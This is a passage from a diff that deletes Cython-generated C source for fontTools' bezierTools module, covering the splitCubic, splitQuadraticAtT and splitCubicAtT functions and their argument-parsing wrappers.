1) - */ - __pyx_t_5 = __Pyx_PyObject_GetItem(__pyx_v_a, __pyx_v_isHorizontal); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 581, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_t_3 = __Pyx_PyObject_GetItem(__pyx_v_b, __pyx_v_isHorizontal); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 581, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __Pyx_PyObject_GetItem(__pyx_v_c, __pyx_v_isHorizontal); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 581, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_7 = __Pyx_PyObject_GetItem(__pyx_v_d, __pyx_v_isHorizontal); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 581, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __pyx_t_9 = PyNumber_Subtract(__pyx_t_7, __pyx_v_where); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 581, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __pyx_t_7 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_6))) { - __pyx_t_7 = PyMethod_GET_SELF(__pyx_t_6); - if (likely(__pyx_t_7)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_6); - __Pyx_INCREF(__pyx_t_7); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_6, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[5] = {__pyx_t_7, __pyx_t_5, __pyx_t_3, __pyx_t_2, __pyx_t_9}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_6, __pyx_callargs+1-__pyx_t_4, 4+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 580, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - } - __pyx_v_solutions = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":583 - * a[isHorizontal], b[isHorizontal], c[isHorizontal], d[isHorizontal] - where - * ) - * solutions = sorted(t for t in solutions if 0 <= t < 1) # <<<<<<<<<<<<<< - * if not solutions: 
- * return [(pt1, pt2, pt3, pt4)] - */ - __pyx_t_6 = __pyx_pf_9fontTools_4misc_11bezierTools_10splitCubic_genexpr(NULL, __pyx_v_solutions); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 583, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_9 = __Pyx_Generator_Next(__pyx_t_6); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 583, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_1 = ((PyObject*)__pyx_t_9); - __pyx_t_9 = 0; - __pyx_t_10 = PyList_Sort(__pyx_t_1); if (unlikely(__pyx_t_10 == ((int)-1))) __PYX_ERR(0, 583, __pyx_L1_error) - __Pyx_DECREF_SET(__pyx_v_solutions, __pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":584 - * ) - * solutions = sorted(t for t in solutions if 0 <= t < 1) - * if not solutions: # <<<<<<<<<<<<<< - * return [(pt1, pt2, pt3, pt4)] - * return _splitCubicAtT(a, b, c, d, *solutions) - */ - __pyx_t_11 = __Pyx_PyObject_IsTrue(__pyx_v_solutions); if (unlikely((__pyx_t_11 < 0))) __PYX_ERR(0, 584, __pyx_L1_error) - __pyx_t_12 = (!__pyx_t_11); - if (__pyx_t_12) { - - /* "fontTools/misc/bezierTools.py":585 - * solutions = sorted(t for t in solutions if 0 <= t < 1) - * if not solutions: - * return [(pt1, pt2, pt3, pt4)] # <<<<<<<<<<<<<< - * return _splitCubicAtT(a, b, c, d, *solutions) - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyTuple_New(4); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 585, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_pt1); - __Pyx_GIVEREF(__pyx_v_pt1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_pt1)) __PYX_ERR(0, 585, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt2); - __Pyx_GIVEREF(__pyx_v_pt2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_pt2)) __PYX_ERR(0, 585, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt3); - __Pyx_GIVEREF(__pyx_v_pt3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_v_pt3)) __PYX_ERR(0, 585, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt4); - __Pyx_GIVEREF(__pyx_v_pt4); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 3, __pyx_v_pt4)) 
__PYX_ERR(0, 585, __pyx_L1_error); - __pyx_t_9 = PyList_New(1); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 585, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyList_SET_ITEM(__pyx_t_9, 0, __pyx_t_1)) __PYX_ERR(0, 585, __pyx_L1_error); - __pyx_t_1 = 0; - __pyx_r = __pyx_t_9; - __pyx_t_9 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":584 - * ) - * solutions = sorted(t for t in solutions if 0 <= t < 1) - * if not solutions: # <<<<<<<<<<<<<< - * return [(pt1, pt2, pt3, pt4)] - * return _splitCubicAtT(a, b, c, d, *solutions) - */ - } - - /* "fontTools/misc/bezierTools.py":586 - * if not solutions: - * return [(pt1, pt2, pt3, pt4)] - * return _splitCubicAtT(a, b, c, d, *solutions) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_9, __pyx_n_s_splitCubicAtT); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 586, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __pyx_t_1 = PyTuple_New(4); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 586, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_INCREF(__pyx_v_a); - __Pyx_GIVEREF(__pyx_v_a); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 0, __pyx_v_a)) __PYX_ERR(0, 586, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_b); - __Pyx_GIVEREF(__pyx_v_b); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 1, __pyx_v_b)) __PYX_ERR(0, 586, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_c); - __Pyx_GIVEREF(__pyx_v_c); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 2, __pyx_v_c)) __PYX_ERR(0, 586, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_d); - __Pyx_GIVEREF(__pyx_v_d); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_1, 3, __pyx_v_d)) __PYX_ERR(0, 586, __pyx_L1_error); - __pyx_t_6 = __Pyx_PySequence_Tuple(__pyx_v_solutions); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 586, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __pyx_t_2 = PyNumber_Add(__pyx_t_1, __pyx_t_6); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 586, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 
0; - __pyx_t_6 = __Pyx_PyObject_Call(__pyx_t_9, __pyx_t_2, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 586, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_r = __pyx_t_6; - __pyx_t_6 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":552 - * - * - * def splitCubic(pt1, pt2, pt3, pt4, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a cubic Bezier curve at a given coordinate. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_XDECREF(__pyx_t_7); - __Pyx_XDECREF(__pyx_t_9); - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitCubic", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_a); - __Pyx_XDECREF(__pyx_v_b); - __Pyx_XDECREF(__pyx_v_c); - __Pyx_XDECREF(__pyx_v_d); - __Pyx_XDECREF(__pyx_v_solutions); - __Pyx_XDECREF(__pyx_gb_9fontTools_4misc_11bezierTools_10splitCubic_2generator3); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":589 - * - * - * def splitQuadraticAtT(pt1, pt2, pt3, *ts): # <<<<<<<<<<<<<< - * """Split a quadratic Bezier curve at one or more values of t. 
- * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_31splitQuadraticAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_30splitQuadraticAtT, "splitQuadraticAtT(pt1, pt2, pt3, *ts)\nSplit a quadratic Bezier curve at one or more values of t.\n\n Args:\n pt1,pt2,pt3: Control points of the Bezier as 2D tuples.\n *ts: Positions at which to split the curve.\n\n Returns:\n A list of curve segments (each curve segment being three 2D tuples).\n\n Examples::\n\n >>> printSegments(splitQuadraticAtT((0, 0), (50, 100), (100, 0), 0.5))\n ((0, 0), (25, 50), (50, 50))\n ((50, 50), (75, 50), (100, 0))\n >>> printSegments(splitQuadraticAtT((0, 0), (50, 100), (100, 0), 0.5, 0.75))\n ((0, 0), (25, 50), (50, 50))\n ((50, 50), (62.5, 50), (75, 37.5))\n ((75, 37.5), (87.5, 25), (100, 0))\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_31splitQuadraticAtT = {"splitQuadraticAtT", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_31splitQuadraticAtT, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_30splitQuadraticAtT}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_31splitQuadraticAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_pt3 = 0; - PyObject *__pyx_v_ts = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[3] = {0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; 
- __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("splitQuadraticAtT (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - __pyx_v_ts = __Pyx_ArgsSlice_FASTCALL(__pyx_args, 3, __pyx_nargs); - if (unlikely(!__pyx_v_ts)) { - __Pyx_RefNannyFinishContext(); - return NULL; - } - __Pyx_GOTREF(__pyx_v_ts); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - default: - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 589, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 589, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitQuadraticAtT", 0, 3, 3, 1); __PYX_ERR(0, 589, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 589, 
__pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("splitQuadraticAtT", 0, 3, 3, 2); __PYX_ERR(0, 589, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - const Py_ssize_t used_pos_args = (kwd_pos_args < 3) ? kwd_pos_args : 3; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, used_pos_args, "splitQuadraticAtT") < 0)) __PYX_ERR(0, 589, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs < 3)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_pt3 = values[2]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("splitQuadraticAtT", 0, 3, 3, __pyx_nargs); __PYX_ERR(0, 589, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_DECREF(__pyx_v_ts); __pyx_v_ts = 0; - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitQuadraticAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_30splitQuadraticAtT(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_ts); - - /* function exit code */ - __Pyx_DECREF(__pyx_v_ts); - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_30splitQuadraticAtT(CYTHON_UNUSED PyObject *__pyx_self, 
PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_ts) { - PyObject *__pyx_v_a = NULL; - PyObject *__pyx_v_b = NULL; - PyObject *__pyx_v_c = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - int __pyx_t_4; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - PyObject *(*__pyx_t_7)(PyObject *); - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("splitQuadraticAtT", 1); - - /* "fontTools/misc/bezierTools.py":609 - * ((75, 37.5), (87.5, 25), (100, 0)) - * """ - * a, b, c = calcQuadraticParameters(pt1, pt2, pt3) # <<<<<<<<<<<<<< - * return _splitQuadraticAtT(a, b, c, *ts) - * - */ - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_calcQuadraticParameters); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 609, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = NULL; - __pyx_t_4 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_4 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_3, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_4, 3+__pyx_t_4); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 609, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - if ((likely(PyTuple_CheckExact(__pyx_t_1))) || (PyList_CheckExact(__pyx_t_1))) { - PyObject* sequence = __pyx_t_1; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 3)) { - if (size > 3) __Pyx_RaiseTooManyValuesError(3); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - 
__PYX_ERR(0, 609, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_2 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_3 = PyTuple_GET_ITEM(sequence, 1); - __pyx_t_5 = PyTuple_GET_ITEM(sequence, 2); - } else { - __pyx_t_2 = PyList_GET_ITEM(sequence, 0); - __pyx_t_3 = PyList_GET_ITEM(sequence, 1); - __pyx_t_5 = PyList_GET_ITEM(sequence, 2); - } - __Pyx_INCREF(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(__pyx_t_5); - #else - __pyx_t_2 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 609, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 609, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_5 = PySequence_ITEM(sequence, 2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 609, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - #endif - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_6 = PyObject_GetIter(__pyx_t_1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 609, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_7 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_6); - index = 0; __pyx_t_2 = __pyx_t_7(__pyx_t_6); if (unlikely(!__pyx_t_2)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_3 = __pyx_t_7(__pyx_t_6); if (unlikely(!__pyx_t_3)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_3); - index = 2; __pyx_t_5 = __pyx_t_7(__pyx_t_6); if (unlikely(!__pyx_t_5)) goto __pyx_L3_unpacking_failed; - __Pyx_GOTREF(__pyx_t_5); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_7(__pyx_t_6), 3) < 0) __PYX_ERR(0, 609, __pyx_L1_error) - __pyx_t_7 = NULL; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - goto __pyx_L4_unpacking_done; - __pyx_L3_unpacking_failed:; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __pyx_t_7 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 609, 
__pyx_L1_error) - __pyx_L4_unpacking_done:; - } - __pyx_v_a = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_b = __pyx_t_3; - __pyx_t_3 = 0; - __pyx_v_c = __pyx_t_5; - __pyx_t_5 = 0; - - /* "fontTools/misc/bezierTools.py":610 - * """ - * a, b, c = calcQuadraticParameters(pt1, pt2, pt3) - * return _splitQuadraticAtT(a, b, c, *ts) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_splitQuadraticAtT); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 610, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_5 = PyTuple_New(3); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 610, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_INCREF(__pyx_v_a); - __Pyx_GIVEREF(__pyx_v_a); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_v_a)) __PYX_ERR(0, 610, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_b); - __Pyx_GIVEREF(__pyx_v_b); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_v_b)) __PYX_ERR(0, 610, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_c); - __Pyx_GIVEREF(__pyx_v_c); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_5, 2, __pyx_v_c)) __PYX_ERR(0, 610, __pyx_L1_error); - __pyx_t_3 = PyNumber_Add(__pyx_t_5, __pyx_v_ts); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 610, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __pyx_t_5 = __Pyx_PyObject_Call(__pyx_t_1, __pyx_t_3, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 610, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":589 - * - * - * def splitQuadraticAtT(pt1, pt2, pt3, *ts): # <<<<<<<<<<<<<< - * """Split a quadratic Bezier curve at one or more values of t. 
- * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_AddTraceback("fontTools.misc.bezierTools.splitQuadraticAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_a); - __Pyx_XDECREF(__pyx_v_b); - __Pyx_XDECREF(__pyx_v_c); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":613 - * - * - * def splitCubicAtT(pt1, pt2, pt3, pt4, *ts): # <<<<<<<<<<<<<< - * """Split a cubic Bezier curve at one or more values of t. - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_33splitCubicAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_32splitCubicAtT, "splitCubicAtT(pt1, pt2, pt3, pt4, *ts)\nSplit a cubic Bezier curve at one or more values of t.\n\n Args:\n pt1,pt2,pt3,pt4: Control points of the Bezier as 2D tuples.\n *ts: Positions at which to split the curve.\n\n Returns:\n A list of curve segments (each curve segment being four 2D tuples).\n\n Examples::\n\n >>> printSegments(splitCubicAtT((0, 0), (25, 100), (75, 100), (100, 0), 0.5))\n ((0, 0), (12.5, 50), (31.25, 75), (50, 75))\n ((50, 75), (68.75, 75), (87.5, 50), (100, 0))\n >>> printSegments(splitCubicAtT((0, 0), (25, 100), (75, 100), (100, 0), 0.5, 0.75))\n ((0, 0), (12.5, 50), (31.25, 75), (50, 75))\n ((50, 75), (59.375, 75), (68.75, 68.75), (77.3438, 56.25))\n ((77.3438, 56.25), (85.9375, 43.75), (93.75, 25), (100, 0))\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_33splitCubicAtT = {"splitCubicAtT", 
(PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_33splitCubicAtT, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_32splitCubicAtT}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_33splitCubicAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_pt3 = 0; - PyObject *__pyx_v_pt4 = 0; - PyObject *__pyx_v_ts = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("splitCubicAtT (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - __pyx_v_ts = __Pyx_ArgsSlice_FASTCALL(__pyx_args, 4, __pyx_nargs); - if (unlikely(!__pyx_v_ts)) { - __Pyx_RefNannyFinishContext(); - return NULL; - } - __Pyx_GOTREF(__pyx_v_ts); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_pt4,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - default: - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - 